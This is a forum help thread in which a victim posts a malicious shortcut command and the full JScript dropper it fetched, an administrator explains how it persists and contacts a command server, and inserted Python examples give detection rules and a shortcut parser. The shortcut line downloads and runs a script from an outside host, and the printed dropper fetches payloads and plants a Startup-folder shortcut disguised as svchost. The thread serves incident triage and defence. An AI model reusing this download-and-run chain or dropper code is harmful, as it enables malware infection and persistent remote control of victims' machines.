Please look at code I accidentally ran from email.


3 replies to this topic

#1 natastna2
  • Members
  • 3 posts

Posted 01 February 2018 - 10:34 AM

Hello,
 
I received an email 20 minutes ago saying there was a problem on a website I run; it linked to an img download site. I downloaded the image, ran it and then noticed it was just named .jpg but was actually a shortcut. (Idiotic!)
 
The shortcut was:
 
C:\Windows\System32\cmd.exe /c mkdir c:\x1\ & cmd.exe /c attrib +h +s c:\x1 & cmd.exe /c "bitsadmin /transfer myjob /download /priority FOREGROUND www.dasc.ist/welcome.js c:\x1\1ax.js & start wscript.exe c:\x1\1ax.js"
 
and then contents of 1ax.js was:
 
var JsName = "win32";        // name of the dropped script (win32.js); "var J" was lost in extraction
var ScName = "svchost";      // name of the persistence shortcut (svchost.lnk); reconstructed from the file list in the reply below
var JpgName = "30012018";    // decoy image shown to the victim
var Server = "dasc.ist/file/file.php?file=";   // download endpoint, file name is appended (closing quote lost in extraction)
 
var YeniOlustur = WScript.CreateObject("WScript.Shell");      // identifiers are Turkish: YeniOlustur = "create new"
AppFolder = YeniOlustur.SpecialFolders("AppData");            // %APPDATA% (Roaming)
InstallFolder = AppFolder+"\\Microsoft\\Windows\\Templates";  // drop directory
StartupFolder = YeniOlustur.SpecialFolders("Startup");        // per-user Startup folder: runs on every logon
WindowsFolder = YeniOlustur.SpecialFolders("windir");
SystemFolder = WindowsFolder+"\\System32";                    // assigned but never used
 
// Connect(islem, dosyadi): GET Server+islem, treat the body as base64, decode it through an
// MSXML bin.base64 node and write the raw bytes to InstallFolder\dosyadi. Any failure
// (no network, server down) sleeps 1.5 s and retries forever.
function Connect(islem,dosyadi)
{
try
{
var checkbeni = new ActiveXObject("MSXML2.XMLHTTP.3.0");
checkbeni["open"]("GET", Server+islem, false);                 // synchronous request
checkbeni.setRequestHeader("UserAgent", "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0)");  // misspelt header: sent as "UserAgent", not "User-Agent"
checkbeni["send"]();
var Cevap = checkbeni["responsetext"];                         // COM name lookup is case-insensitive, so this resolves to responseText
 
    var xmlObj = WScript.CreateObject("MSXml2.DOMDocument");
    var docElement = xmlObj.createElement("Base64Data");
    docElement.dataType = "bin.base64";                        // node decodes the base64 text into bytes
    docElement.text = Cevap;
    var outputStream = WScript.CreateObject("ADODB.Stream");
    outputStream.Type = 1;                                     // adTypeBinary
    outputStream.Open(); 
    outputStream.Write(docElement.nodeTypedValue);             // decoded bytes
    outputStream.SaveToFile(InstallFolder + "\\"+dosyadi, 2);  // adSaveCreateOverWrite
    outputStream.Close();
 
}
catch(AHA) {  WScript.sleep(1500); Connect(islem,dosyadi); }   // unbounded retry
}
 
// Install(): on first run fetch win32.js, write svchost.lnk to both the Startup and Templates
// folders and launch the Templates copy; on every run fetch (once) and open the decoy image.
function Install()
{
myObject = new ActiveXObject("Scripting.FileSystemObject");
 
if(!myObject.FileExists(InstallFolder + "\\"+JsName+".js")) {
Connect(JsName,JsName+".js");                                  // GET ...file.php?file=win32 -> Templates\win32.js
Short(StartupFolder);                                          // Startup\svchost.lnk (persistence)
Short(InstallFolder);                                          // Templates\svchost.lnk
YeniOlustur["run"](InstallFolder+"\\"+ScName+".lnk", 1);       // start win32.js now via the shortcut
}
 
if(!myObject.FileExists(InstallFolder + "\\"+JpgName+".jpg")) {
Connect(JpgName,JpgName+".jpg"); }                             // GET ...file.php?file=30012018 -> Templates\30012018.jpg
 
YeniOlustur["run"](InstallFolder+"\\"+JpgName+".jpg", 1);      // open the decoy so the victim sees a picture
}
 
// Short(adresv): write adresv\svchost.lnk -> wscript.exe <Templates>\win32.js
function Short(adresv)
{ try{
var Kisayolcu = YeniOlustur.CreateShortcut(adresv + "\\"+ScName+".lnk");
var adresim = "wscript.exe";
Kisayolcu.TargetPath = adresim;
Kisayolcu.Arguments = InstallFolder+"\\"+JsName+".js";
Kisayolcu.WorkingDirectory = InstallFolder;
Kisayolcu.Save();
} catch(YOKYA){   WScript.sleep(1500);  Short(); } }           // bug in the original: the retry drops adresv
 
Install();
 
------------------------------------------
 
I would very much appreciate anyone who could tell me what this might have done. It was not picked up by my antivirus and I am running malwarebytes / tdss scans currently.
 
Thank you very much for any help / advice.
 
Regards,
Natastna2
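The one-liner in the shortcut is a compact chain of living-off-the-land binaries: cmd.exe creates a scratch directory and hides it with attrib +h +s, bitsadmin fetches the script, and wscript.exe runs it. What follows is an added example, not code from the post, of the detection rules a SOC would run over process-creation telemetry for that chain. The Python is mine; the ProcEvent fields mirror Sysmon Event ID 1 (Image, CommandLine, ParentImage), the rule names are my own, and the sample records are constructed, including a benign bitsadmin download and a benign attrib call so the rules can be seen not firing on ordinary admin use.

```python
# Added example: detection rules for the cmd.exe -> attrib -> bitsadmin -> wscript.exe
# chain in the shortcut above, run over constructed process-creation records
# (Sysmon Event ID 1 style fields). Not code from the post; field and rule names are mine.
import re
from dataclasses import dataclass
from typing import Callable, List, Tuple


@dataclass
class ProcEvent:
    image: str          # full path of the new process
    command_line: str
    parent_image: str


SCRIPT_EXT = r"(?:js|jse|vbs|vbe|wsf|hta)"

# bitsadmin used as a downloader whose destination is a script or executable
BITS_DOWNLOAD = re.compile(
    r"\bbitsadmin(?:\.exe)?\s+/transfer\b.*?/download\b.*?"
    + r"(?:https?://)?(?:[\w-]+\.)+[a-z]{2,}\S*\s+"            # source URL
    + r"(\S+\.(?:" + SCRIPT_EXT + r"|exe|dll|ps1))\b",          # destination file
    re.I)

# attrib +h +s in one command segment: hiding a dropped directory or file (c:\x1 above)
ATTRIB_HIDE = re.compile(r"\battrib(?:\.exe)?\s+(?=[^&|]*\+h\b)(?=[^&|]*\+s\b)", re.I)

# wscript/cscript handed a script in a drive-root scratch dir (c:\x1\1ax.js) or under AppData
SCRIPT_HOST = re.compile(
    r"\b[wc]script(?:\.exe)?\b.*?"
    + r'(?:[a-z]:\\[^\\\s"]+\\[^\\\s"]+\.' + SCRIPT_EXT + r"\b"
    + r"|\\AppData\\\S*\." + SCRIPT_EXT + r"\b)",
    re.I)

# a double-clicked .lnk runs its command line as cmd.exe under explorer.exe
LNK_CHAIN = re.compile(r"\bbitsadmin\b.*\b[wc]script\b", re.I | re.S)


def cmd_chain_from_explorer(ev: ProcEvent) -> bool:
    return (ev.image.lower().endswith("\\cmd.exe")
            and ev.parent_image.lower().endswith("\\explorer.exe")
            and LNK_CHAIN.search(ev.command_line) is not None)


RULES: List[Tuple[str, Callable[[ProcEvent], bool]]] = [
    ("bits_download_script", lambda ev: BITS_DOWNLOAD.search(ev.command_line) is not None),
    ("attrib_hide_path",     lambda ev: ATTRIB_HIDE.search(ev.command_line) is not None),
    ("script_host_odd_path", lambda ev: SCRIPT_HOST.search(ev.command_line) is not None),
    ("lnk_style_cmd_chain",  cmd_chain_from_explorer),
]


def match_rules(ev: ProcEvent) -> List[str]:
    """Names of every rule the event trips, in RULES order."""
    return [name for name, pred in RULES if pred(ev)]


def triage(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """(index, rule names) for each event that trips at least one rule."""
    out = []
    for i, ev in enumerate(events):
        hits = match_rules(ev)
        if hits:
            out.append((i, hits))
    return out


# Constructed sample records: the posted shortcut command as launched from Explorer, its
# wscript.exe child, the Startup-folder relaunch of win32.js, and two benign admin commands.
SAMPLE_EVENTS = [
    ProcEvent(r"C:\Windows\System32\cmd.exe",
              r'C:\Windows\System32\cmd.exe /c mkdir c:\x1\ & cmd.exe /c attrib +h +s c:\x1 & '
              r'cmd.exe /c "bitsadmin /transfer myjob /download /priority FOREGROUND '
              r'www.dasc.ist/welcome.js c:\x1\1ax.js & start wscript.exe c:\x1\1ax.js"',
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe", r"wscript.exe c:\x1\1ax.js",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\wscript.exe",
              r'"C:\Windows\System32\wscript.exe" '
              r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Templates\win32.js",
              r"C:\Windows\explorer.exe"),
    ProcEvent(r"C:\Windows\System32\bitsadmin.exe",
              r"bitsadmin /transfer wsus /download /priority normal "
              r"https://updates.example.invalid/kb.cab C:\ProgramData\upd\kb.cab",
              r"C:\Windows\System32\cmd.exe"),
    ProcEvent(r"C:\Windows\System32\attrib.exe", r"attrib +r C:\docs\report.docx",
              r"C:\Windows\System32\cmd.exe"),
]

if __name__ == "__main__":
    for idx, names in triage(SAMPLE_EVENTS):
        print(idx, SAMPLE_EVENTS[idx].image, names)
```

The rules are deliberately narrow so they survive contact with real telemetry: bitsadmin only fires when the destination is a script or executable, attrib only when +h and +s appear together in one command segment, and the script-host rule only for scripts under a drive-root scratch directory or AppData. The first record trips all four rules at once, which is the signal worth paging on; the relaunch from the Startup folder trips only the script-host rule, so that rule is the one to keep at a lower severity for hunting rather than alerting.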


#2 Grinler (Lawrence Abrams)
  • Admin
  • 43,593 posts
  • Location:USA

Posted 01 February 2018 - 04:02 PM

This script downloads some other javascript files and an image and sets it up like this:

%UserProfile%\AppData\Roaming\Microsoft\Windows\Recent\30012018.jpg.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Recent\Templates.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Templates\30012018.jpg
%UserProfile%\AppData\Roaming\Microsoft\Windows\Templates\svchost.lnk
%UserProfile%\AppData\Roaming\Microsoft\Windows\Templates\win32.js

On login, svchost.lnk will launch win32.js, which connects to a Command & Control server that will send commands to execute.
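The Startup-folder svchost.lnk is the persistence, and on a host being triaged the first question is what each .lnk in that folder actually launches. The block below is an added example, not from the thread: a minimal Shell Link (.lnk) parser in Python following the MS-SHLLINK layout (a 76-byte header with LinkFlags at offset 20, optional LinkTargetIDList and LinkInfo blocks skipped by their size fields, then the length-prefixed StringData fields for name, relative path, working directory, arguments and icon), plus a check that flags shortcuts whose arguments name a script file and whose visible target is a script host. The build_lnk helper and the sample links are constructed test input, and the parser reads only StringData: a target stored solely in the IDList or LinkInfo is not resolved here, so such a link is reported as suspect rather than clean.

```python
# Added example: minimal MS-SHLLINK (.lnk) StringData parser for triaging Startup-folder
# shortcuts like the svchost.lnk listed above. Not code from the thread; the in-memory
# sample links built below are constructed test input.
import os
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

HEADER_SIZE = 0x4C
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")  # {00021401-0000-0000-C000-000000000046}
HAS_IDLIST, HAS_LINKINFO, HAS_NAME, HAS_RELPATH = 0x01, 0x02, 0x04, 0x08
HAS_WORKDIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
SCRIPT_HOSTS = ("wscript.exe", "cscript.exe", "mshta.exe", "powershell.exe")
SCRIPT_EXTS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta", ".ps1")


@dataclass
class LnkStrings:
    name: Optional[str]
    relative_path: Optional[str]
    working_dir: Optional[str]
    arguments: Optional[str]
    icon_location: Optional[str]


def parse_lnk_strings(data: bytes) -> LnkStrings:
    """Walk header -> [LinkTargetIDList] -> [LinkInfo] -> StringData; return the strings."""
    if len(data) < HEADER_SIZE or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a shell link: bad HeaderSize or LinkCLSID")
    flags = struct.unpack_from("<I", data, 20)[0]
    pos = HEADER_SIZE

    def field(fmt: str) -> int:                  # bounds-checked little-endian read
        nonlocal pos
        size = struct.calcsize(fmt)
        if pos + size > len(data):
            raise ValueError("truncated shell link")
        val = struct.unpack_from(fmt, data, pos)[0]
        pos += size
        return val

    if flags & HAS_IDLIST:                       # IDListSize (u16) then that many bytes
        pos += field("<H")
    if flags & HAS_LINKINFO:                     # LinkInfoSize (u32) counts itself
        pos += field("<I") - 4
    unicode = bool(flags & IS_UNICODE)

    def read_string(flag: int) -> Optional[str]:
        nonlocal pos
        if not flags & flag:
            return None
        count = field("<H")                      # CountCharacters, not bytes
        nbytes = count * 2 if unicode else count
        raw = data[pos:pos + nbytes]
        if len(raw) != nbytes:
            raise ValueError("truncated StringData")
        pos += nbytes
        return raw.decode("utf-16-le" if unicode else "cp1252")

    return LnkStrings(read_string(HAS_NAME), read_string(HAS_RELPATH), read_string(HAS_WORKDIR),
                      read_string(HAS_ARGS), read_string(HAS_ICON))


def is_script_launcher(link: LnkStrings) -> bool:
    """Arguments name a script file and the visible target (RelativePath) is a script host,
    or is absent (target only in IDList/LinkInfo, which this parser does not resolve)."""
    args = (link.arguments or "").lower()
    if not any(ext in args for ext in SCRIPT_EXTS):
        return False
    target = (link.relative_path or "").lower()
    return target == "" or target.endswith(SCRIPT_HOSTS)


def build_lnk(relative_path: str, working_dir: str, arguments: str) -> bytes:
    """Constructed minimal .lnk (header + three Unicode StringData fields) for offline tests."""
    flags = HAS_RELPATH | HAS_WORKDIR | HAS_ARGS | IS_UNICODE
    out = struct.pack("<I16sI", HEADER_SIZE, LNK_CLSID, flags) + bytes(HEADER_SIZE - 24)
    for s in (relative_path, working_dir, arguments):
        out += struct.pack("<H", len(s)) + s.encode("utf-16-le")
    return out


# Constructed samples: the shape of Startup\svchost.lnk from the thread, and an ordinary app shortcut.
TEMPLATES = r"C:\Users\victim\AppData\Roaming\Microsoft\Windows\Templates"
SAMPLE_STARTUP_LNK = build_lnk("wscript.exe", TEMPLATES, TEMPLATES + r"\win32.js")
SAMPLE_BENIGN_LNK = build_lnk(r"..\..\..\..\..\Program Files\App\app.exe", r"C:\Program Files\App", "")


def scan_dir(path: str) -> List[Tuple[str, LnkStrings]]:
    """Parse every .lnk in a directory (e.g. the per-user Startup folder); return the suspects."""
    hits = []
    for name in sorted(os.listdir(path)):
        if not name.lower().endswith(".lnk"):
            continue
        with open(os.path.join(path, name), "rb") as fh:
            try:
                link = parse_lnk_strings(fh.read())
            except ValueError:
                continue                         # not a link or damaged: out of scope here
        if is_script_launcher(link):
            hits.append((name, link))
    return hits


if __name__ == "__main__":
    link = parse_lnk_strings(SAMPLE_STARTUP_LNK)
    print("suspect:", is_script_launcher(link), link.relative_path, link.arguments)
```

On a live Windows host, point scan_dir at %APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup (and the all-users equivalent under %ProgramData%). Arguments set through WScript.Shell's CreateShortcut land in the COMMAND_LINE_ARGUMENTS string, which is why a StringData-only parser is enough to see the Templates\win32.js argument; the target path itself may live only in the IDList, so an empty relative_path is treated as unknown, not benign.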

#3 Grinler (Lawrence Abrams)
  • Admin
  • 43,593 posts
  • Location:USA

Posted 01 February 2018 - 05:23 PM

Btw, could you submit the email to https://www.bleepingcomputer.com/submit-malware.php?channel=3

Would like to do a quick story on it to alert our visitors.

#4 natastna2
  • Topic Starter
  • Members
  • 3 posts

Posted 02 February 2018 - 06:40 PM

Thank you very much for your help and time in responding to me. I really appreciate it.

I decided to just reformat to be on the safe side.

I'll submit that email now.

Kind regards,

natastna2





